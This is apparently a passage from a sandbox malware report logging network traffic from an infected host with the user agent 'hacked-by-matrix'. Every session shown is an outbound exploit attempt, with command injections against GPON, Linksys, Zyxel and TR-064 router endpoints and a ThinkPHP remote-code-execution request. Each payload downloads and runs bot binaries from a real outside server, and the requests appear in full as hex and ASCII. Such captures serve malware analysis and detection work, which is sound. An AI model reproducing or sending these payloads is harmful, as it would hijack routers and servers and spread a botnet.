                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1990192.168.2.1348580109.133.37.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.858047962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1991192.168.2.13471925.238.50.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.858048916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1992192.168.2.134345042.124.62.36443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.858061075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1993192.168.2.134268295.214.132.4980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.958261013 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:39.084223032 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:39.311908007 CET1020INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 769
                                                        date: Thu, 21 Mar 2024 04:23:38 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>
                                                        Mar 21, 2024 05:23:46.037211895 CET1020INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 769
                                                        date: Thu, 21 Mar 2024 04:23:38 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1994192.168.2.135704295.71.118.14980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.972376108 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:39.180233002 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:40.588747025 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:43.533334017 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:49.168209076 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1995192.168.2.1347534212.46.14.780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.168517113 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:38.378369093 CET490INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:23:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: keep-alive
                                                        Location: https:///login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
                                                        Strict-Transport-Security: max-age=31536000;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1996192.168.2.1347598172.65.156.608080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.181715965 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1997192.168.2.134720298.50.228.278080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.231414080 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1998192.168.2.1353836172.65.86.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.278608084 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1999192.168.2.1351640172.66.194.728080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.278701067 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:38.796278954 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2000192.168.2.1345298152.170.146.67547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.310863018 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:39.083350897 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2001192.168.2.1343292206.238.237.4180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.884584904 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2002192.168.2.1360354200.234.153.10280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.917788029 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:39.040334940 CET874INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:38 GMT
                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                        Content-Length: 217
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 33 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
